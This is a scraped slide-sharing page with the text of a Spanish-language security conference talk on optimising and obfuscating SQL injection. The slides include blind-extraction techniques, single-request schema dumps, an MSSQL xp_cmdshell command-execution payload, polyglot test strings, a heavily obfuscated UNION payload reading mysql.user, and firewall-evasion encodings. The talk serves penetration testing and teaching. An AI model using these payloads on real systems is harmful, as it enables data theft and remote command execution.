Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
 
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
Desarrollando para Nmap Scripting Engine (NSE) [GuadalajaraCON 2013]
 

Similar a Nuevas técnicas de optimización y ofuscación [GuadalajaraCON 2013]

Nuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionNuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionTensor
 
Tecnicas de Blind-Mysql-Injection
Tecnicas de Blind-Mysql-InjectionTecnicas de Blind-Mysql-Injection
Tecnicas de Blind-Mysql-Injectionq3rv0
 
7090112 Clase Transact Sql Server
7090112 Clase Transact Sql Server7090112 Clase Transact Sql Server
7090112 Clase Transact Sql ServerCorfapo
 
3. algoritmos de ordenamiento interno
3. algoritmos de ordenamiento interno3. algoritmos de ordenamiento interno
3. algoritmos de ordenamiento internoFernando Solis
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Eduardo Castro
 
Laboratorio # 4 tic jean carlos hernandez
Laboratorio # 4 tic jean carlos hernandezLaboratorio # 4 tic jean carlos hernandez
Laboratorio # 4 tic jean carlos hernandezJeanCarlosHernandezM
 
Planes de ejecución 1
Planes de ejecución 1Planes de ejecución 1
Planes de ejecución 1SolidQ
 
Sistemas numéricos datos y expresiones - tatis
Sistemas numéricos datos y expresiones - tatisSistemas numéricos datos y expresiones - tatis
Sistemas numéricos datos y expresiones - tatisAlcira Ordóñez Rey
 

Similar a Nuevas técnicas de optimización y ofuscación [GuadalajaraCON 2013] (20)

Nuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacionNuevas tecnicas de optimización y ofuscacion
Nuevas tecnicas de optimización y ofuscacion
 
Mysql
MysqlMysql
Mysql
 
Tuning fondo-negro-2
Tuning fondo-negro-2Tuning fondo-negro-2
Tuning fondo-negro-2
 
(In) seguridad web
(In) seguridad web(In) seguridad web
(In) seguridad web
 
Sesión 4
Sesión 4Sesión 4
Sesión 4
 
Tecnicas de Blind-Mysql-Injection
Tecnicas de Blind-Mysql-InjectionTecnicas de Blind-Mysql-Injection
Tecnicas de Blind-Mysql-Injection
 
7090112 Clase Transact Sql Server
7090112 Clase Transact Sql Server7090112 Clase Transact Sql Server
7090112 Clase Transact Sql Server
 
Presentacionsubnet
PresentacionsubnetPresentacionsubnet
Presentacionsubnet
 
3. algoritmos de ordenamiento interno
3. algoritmos de ordenamiento interno3. algoritmos de ordenamiento interno
3. algoritmos de ordenamiento interno
 
Sentencias
SentenciasSentencias
Sentencias
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos
 
Mysql
MysqlMysql
Mysql
 
MANUAL
MANUALMANUAL
MANUAL
 
Laboratorio # 4 tic jean carlos hernandez
Laboratorio # 4 tic jean carlos hernandezLaboratorio # 4 tic jean carlos hernandez
Laboratorio # 4 tic jean carlos hernandez
 
Planes de ejecución 1
Planes de ejecución 1Planes de ejecución 1
Planes de ejecución 1
 
FP-Unidad2-Sesión02.pdf
FP-Unidad2-Sesión02.pdfFP-Unidad2-Sesión02.pdf
FP-Unidad2-Sesión02.pdf
 
Planes de ejecucion 1
Planes de ejecucion 1Planes de ejecucion 1
Planes de ejecucion 1
 
Sistemas numéricos datos y expresiones - tatis
Sistemas numéricos datos y expresiones - tatisSistemas numéricos datos y expresiones - tatis
Sistemas numéricos datos y expresiones - tatis
 
Capítulo 4: Cifrado en Bloque
Capítulo 4: Cifrado en BloqueCapítulo 4: Cifrado en Bloque
Capítulo 4: Cifrado en Bloque
 
In 29
In 29In 29
In 29
 

Más de Websec México, S.C.

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Websec México, S.C.
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...Websec México, S.C.
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonWebsec México, S.C.
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Websec México, S.C.
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are backWebsec México, S.C.
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Websec México, S.C.
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeWebsec México, S.C.
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PaleWebsec México, S.C.
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaWebsec México, S.C.
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmWebsec México, S.C.
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Websec México, S.C.
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranWebsec México, S.C.
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoWebsec México, S.C.
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaWebsec México, S.C.
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónWebsec México, S.C.
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínWebsec México, S.C.
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Websec México, S.C.
 
Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Websec México, S.C.
 

Más de Websec México, S.C. (20)

Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]Ciberseguridad durante la pandemia [Paulino Calderon]
Ciberseguridad durante la pandemia [Paulino Calderon]
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino CalderonEstadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
 
Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]Derrotando a changos con scanners [Paulino Calderon]
Derrotando a changos con scanners [Paulino Calderon]
 
Old fox new tricks malicious macros are back
Old fox new tricks malicious macros are backOld fox new tricks malicious macros are back
Old fox new tricks malicious macros are back
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
 
Mi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of CodeMi experiencia en el programa Google Summer of Code
Mi experiencia en el programa Google Summer of Code
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon PalePwning corporate networks in a single day by Paulino Calderon Pale
Pwning corporate networks in a single day by Paulino Calderon Pale
 
Explotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis ColungaExplotación práctica de señales de radio por Luis Colunga
Explotación práctica de señales de radio por Luis Colunga
 
Obtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkmObtener contraseñas del directorio activo por hkm
Obtener contraseñas del directorio activo por hkm
 
OSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickopsOSINT vs CIBERCRIMEN por nickops
OSINT vs CIBERCRIMEN por nickops
 
Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk Recuperacion de defaces con versionador Git por Alevsk
Recuperacion de defaces con versionador Git por Alevsk
 
Seguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel BeltranSeguridad en Bitcoin por Luis Daniel Beltran
Seguridad en Bitcoin por Luis Daniel Beltran
 
CPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto SalgadoCPMX5 - Hacking like a boss por Roberto Salgado
CPMX5 - Hacking like a boss por Roberto Salgado
 
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis ColungaCPMX5 - Las nuevas generaciones de redes por Luis Colunga
CPMX5 - Las nuevas generaciones de redes por Luis Colunga
 
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino CalderónCPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
CPMX5 - (IN)seguridad en infraestructura tecnológica por Paulino Calderón
 
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro JoaquínCPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
CPMX5 - Explotación masiva de vulnerabilidades en ruteadores por Pedro Joaquín
 
Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013Técnicas de escaneo masivo - 11/2013
Técnicas de escaneo masivo - 11/2013
 
Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)Drive by subdomain router pharming (2012)
Drive by subdomain router pharming (2012)
 
Hardware para hacking (2011)
Hardware para hacking (2011)Hardware para hacking (2011)
Hardware para hacking (2011)
 

Nuevas técnicas de optimización y ofuscación [GuadalajaraCON 2013]

  • 1.
  • 2. ‘) UNION SELECT `Esta_Platica` AS (Nuevas Técnicas de Optimización y Ofuscación’)%00
  • 3. Roberto Salgado • Co-fundador de Websec • Proporcionar soluciones de seguridad • Pen-testing, capacitación y monitoreo • Creador del base de conocimientos de SQLi • Pythonista / Investigador de seguridad Contacto • rsalgado@websec.mx • http://www.websec.mx • http://www.twitter.com/@LightOS
  • 4. Indicé Optimización • Reducir el numero de peticiones • Reducir el tamaño de las peticiones Ofuscación • Retos de SQLi • Evadir Firewalls • Diversión con codificaciones Leapfrog • SQLi • LFI • XSS
  • 5. Exploits de una mama Como prevenir Inyecciones de SQL? http://www.bobby-tables.com http://xkcd.com/327/
  • 7. • Por que nos importa? OPTIMIZACION Intro http://xkcd.com/85/
  • 8. Análisis de métodos • Bisección • Bitwise • Regex • Binario a posición (Bin2Pos) OPTIMIZACION Inyección de SQL a Ciegas
  • 9. Recordatorio • Solo podemos obtener 1 carácter a la vez • Testeamos si tenemos el carácter correcto con respuestas “True” o “False” Ejemplo • SELECT * FROM users WHERE id=1 AND 1=1 • SELECT * FROM users WHERE id=1 AND 1=2 OPTIMIZACION Inyección de SQL a Ciegas
  • 11. OPTIMIZACION Tabla ASCII Cada character ASCII puede ser representado con 1 byte o 8 bits Caracter a Binario (base 2) 01100001 Octal (base 8) 141 Decimal (base 10) 97 Hexadecimal (base 16) 61
  • 12. El octavo bit del carácter ASCII que nos interesa siempre será 0 OPTIMIZACION Tabla ASCII Decimal Hexadecimal Binario 0 00 00000000 127 7F 01111111 255 FF 11111111 El rango ASCII que nos interesa Decimal Hexadecimal Binario 0 00 00000000 127 7F 01111111
  • 13. • Algoritmo de búsqueda binaria • ASCII rango 32 – 126 • Se divide la mitad: (32 + 126) / 2 = 79 • El valor es mayor o menor? • Se divide la mitad nuevamente y se repite el proceso OPTIMIZACION Método Bisección
  • 14. a = 97 decimal OPTIMIZACION Método Bisección 97 entre 79 y 126 True (32 + 126) / 2 = 79 97 entre 79 y 103 True (79 + 126) / 2 = 102.5 97 entre 79 y 91 False (79 + 103) / 2 = 91 97 entre 91 y 103 True (91 + 103) / 2 = 97 97 entre 91 y 97 True (91 + 97) / 2 = 95 97 entre 91 y 95 False (95 + 97) / 2 = 96 97 entre 95 y 97 True 97 != 96 97 == 97
  • 15. • Cada carácter ASCII puede ser representado en 1 byte o 8 bits • El octavo bit del rango ASCII de los caracteres que nos interesa siempre es 0 • El numero de peticiones siempre será 7 OPTIMIZACION Métodos Bitwise
  • 16. OPTIMIZACION Métodos Bitwise 01100001 >> 7 00000000 0 01100001 >> 6 00000001 1 01100001 >> 5 00000011 3 01100001 >> 4 00000110 6 01100001 >> 3 00001100 12 01100001 >> 2 00011000 24 01100001 >> 1 00110000 48 01100001 >> 0 01100001 97 "Faster Blind MySQL Injection Using Bit Shifting" - Por Jelmer de Hen
  • 17. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 (97 >> 7) = 0 1 o 0 1 (97 >> 6) = 0 1 o 0 0 (97 >> 5) = 2 010 o 011 0 (97 >> 4) = 6 0110 o 0111 1 "Faster Blind MySQL Injection Using Bit Shifting" - Por Jelmer de Hen
  • 18. OPTIMIZACION Métodos Bitwise "Faster Blind MySQL Injection Using Bit Shifting" - Por Jelmer de Hen Pros: • La cantidad de peticiones es consistente Contras: • Siempre usa 7 peticiones • Implementacion rara • No soporta hilos
  • 19. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 substr(bin(97>>7),-1,1) 1 o 0 0 substr(bin(97>>6),-1,1) 1 o 0 1 substr(bin(97>>5),-1,1) 1 o 0 1 substr(bin(97>>4),-1,1) 1 o 0 0 "Faster Blind MySQL Injection Using Bit Shifting" – Mi variacion
  • 20. OPTIMIZACION Métodos Bitwise "Faster Blind MySQL Injection Using Bit Shifting" – Mi variacion Pros: • La cantidad de peticiones es consistente • Hilos Contras: • Siempre usa 7 peticiones
  • 21. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 97 & 2 00000010 97 & 4 00000100 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
  • 22. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 97 & 4 00000100 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
  • 23. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 0 97 & 4 00000100 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
  • 24. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 0 97 & 4 00000100 0 97 & 8 00001000 "Bit ANDing" - Por Ruben Ventura
  • 25. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 97 & 1 00000001 1 97 & 2 00000010 0 97 & 4 00000100 0 97 & 8 00001000 0 "Bit ANDing" - Por Ruben Ventura
  • 26. "Bit ANDing" - Por Ruben Ventura OPTIMIZACION Métodos Bitwise Pros: • La cantidad de peticiones es consistente • Hilos Contras: • Siempre usa 7 peticiones
  • 27. OPTIMIZACION Métodos Bitwise a = 97 dec = 01100001 substr(bin(97),1,1) 1100001 1 substr(bin(97),2,1) 1100001 1 substr(bin(97),3,1) 1100001 0 substr(bin(97),4,1) 1100001 0 "Bit Substringing" - Por Keith Makan
  • 28. "Bit Substringing" - Por Keith Makan OPTIMIZACION Métodos Bitwise Pros: • La cantidad de peticiones es consistente • Hilos Contras: • Siempre usa 7 peticiones
  • 29. ‚Regex method‛ - Por Simone 'R00T_ATI' Quatrini y Marco 'white_sheep' Rondini OPTIMIZACION Método Regex REGEXP '^[a-z]' True REGEXP '^[a-n]' True REGEXP '^[a-g]' False REGEXP '^[h-n]' True REGEXP '^[h-l]' False
  • 30. ‚Regex method‛ - Por Simone 'R00T_ATI' Quatrini y Marco 'white_sheep' Rondini OPTIMIZACION Método Regex Pros: • No se tiene que convertir a decimal Contras: • Requiere comillas
  • 31. • Requiere una lista de los caracteres posibles (32 – 126 decimal) • Entre mas cerca este el carácter al inicio de la lista, menos cantidad de peticiones son requeridas • Podemos ordenar la lista de caracteres por las letras mas frecuentes del idioma OPTIMIZACION Método Bin2Pos
  • 32. • Relacionar el carácter con su posición en la lista • Convertir esta posición a binario • Hemos reducido la cantidad de caracteres a buscar a 2 (0 y 1) OPTIMIZACION Método Bin2Pos
  • 33. • Nuestra lista (sin mayúsculas) – abcdefghijklmnopqrstuvwxyz _0123456789,.<>/?;:'"[{]}|=+- )(*&^%$#@!`~ • Lista hexadecimal – 0123456789ABCDEF • La lista mas grande tiene 94 caracteres – BIN(1) = 1 – BIN(94) = 1011110 OPTIMIZACION Método Bin2Pos
  • 34. OPTIMIZACION Método Bin2Pos IF((@a:=MID(BIN(POSITION(MID((SE LECT password from users where id=2 LIMIT 1),1,1)IN CHAR(48,49,50,51,52,53,54,55,56, 57,65,66,67,68,69,70))),1,1))!=s pace(0),2-@a,0/0)
  • 36. OPTIMIZACION Método Bin2Pos • “C” es la 3era posición en la lista, que equivale a 11 en binario • El 11 tiene 6 ceros a su izquierda: 00000011 • Nuestra petición empieza con el primer 1 • Por lo mismo, el primer numero siempre será 1
  • 37. OPTIMIZACION Método Bin2Pos Obteniendo 11 • Sabemos que el primer digito es 1 • No requiere petición • El segundo digito es 1? • Si • El tercer digito es 1? • No, el tercer digito no existe • Numero total de peticiones para “C”: 2
  • 38. OPTIMIZACION Método Bin2Pos Pros: • Muy pocas peticiones • No es fácil de entender Contras: • Requieres 2 paginas diferentes • Entre mas grande la lista, mas peticiones son requeridas
  • 42. Obtener todas las bases de datos, tablas y columnas con solo una petición OPTIMIZANDO CONSULTAS MySQL
  • 43. SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x OPTIMIZANDO CONSULTAS MySQL
  • 45. Una consulta para ejecución de código remota • Checa si xp_cmdshell esta cargado • Si esta cargado, checa si esta activo • Corre el comando 'dir' y guarda el resultado en la tabla TMP_DB OPTIMIZANDO CONSULTAS MSSQL
  • 46. ' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'<br></font><font color="black">'%2Bdir,'<dir>','</font><font color="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB-- OPTIMIZANDO CONSULTAS MSSQL
  • 47. • Las pruebas pueden llegar a ser tedioso • Inyecciones de SQL pueden usar comillas, comillas dobles o no tener comillas • 400+ parámetros por modulo?!?! OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea
  • 48. Mínimo 3 pruebas diferentes por parámetro: • OR 1=1 • OR '1'='1 • OR “1”=“1 OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea
  • 49. Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''='
  • 50. Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''=' • Sin comillas
  • 51. Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''=' • Sin comillas • Doble comillas
  • 52. Que tal si los fusionamos? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - OR 1#"OR"'OR''='"="'OR''=' • Sin comillas • Doble comillas • Comillas simples
  • 53. Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!='
  • 54. Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!=' • Sin comillas
  • 55. Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!=' • Sin comillas • Doble comillas
  • 56. Que tal AND? OPTIMIZANDO CONSULTAS Mas Consultas de 1 Línea - !=0--+"!="'!=' • Sin comillas • Doble comillas • Comillas simples
  • 60. OFUSCACION Como Confundir al Admin UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'a dmin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi( )),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F5 3)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-- ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))- floor(pi()))),0x6d7973716c))from(select-- (select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00O ooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat( `user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
  • 62. EVADIENDO FIREWALLS Tips Generales • Simple casi siempre es mejor • Lea la documentación para el comportamiento inesperado y rarezas • Aprende de que es capaz el sistema de base de datos y lo que puede manejar
  • 63. OFUSCACION Fuzzer Sencillo en PHP <?php $link = mysql_connect('localhost', 'root', ''); for($i=0; $i<=255; $i++) { $query = mysql_query("SELECT 1 FROM dual WHERE 1" . chr($i) . "=1"); if(!$query) { continue; } echo $i . ':0x' . dechex($i) . ':' . chr($i) . '<br>'; } ?>
  • 65. OFUSCACION Espacios Validos SQLite3 - 0A, 0D, 0C, 09, 20 MySQL - 09, 0A, 0B, 0C, 0D, A0, 20 MSSQL - 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 25
  • 66. EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN TRUE THEN TRUE END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
  • 67. EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN TRUE THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
  • 68. EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
  • 69. EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE FROM dual) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
  • 70. EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE FROM dual) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
  • 71. EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT TRUE FROM`dual`) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
  • 72. EVADIENDO FIREWALLS Tips Generales • No empieces con algo complicado y obvio • Mejor mantenlo simple – CASE WHEN (SELECT(TRUE)FROM`dual`) THEN TRUE ELSE 1 END - UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES
  • 73. EVADIENDO FIREWALLS Retos de SQLi Modsecurity http://www.modsecurity.org/testphp.vulnweb.c om/artists.php?artist=- 2%20div%201%20union%20all%23in%0A%23bet ween%20comments%0A23in%0A%23between% 20comments%0A%0Aselect%200x00,%200x41% 20like/*!31337table_name*/,3%20from%20inf ormation_schema.tables%20limit%201
  • 74. EVADIENDO FIREWALLS Codificaciones • URL encode • Double URL encode • Unicode encode • Short UTF8 • Long UTF8 • First Nibble • Second Nibble • Double Nibble • Invalid Hex
  • 75. EVADIENDO FIREWALLS – Codificaciones URL Encode • URL Encoding se usa para transformar caracteres “especiales” para que se puedan mandar por HTTP • Los caracteres son transformados en su equivalente hexadecimal, con el % (signo de porcentaje) de prefijo • a = %61
  • 76. EVADIENDO FIREWALLS – Codificaciones Double URL Encode • Double URL encode es el proceso de re- codificar el % (signo de porcentaje) • a = %61 • %61 = %2561
  • 77. EVADIENDO FIREWALLS – Codificaciones URL Encode / Firewalls Debiles Descripcion del tamper script “charencode” de SQLMAP que se usa para codificar la peticion como URL encode: “Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset”
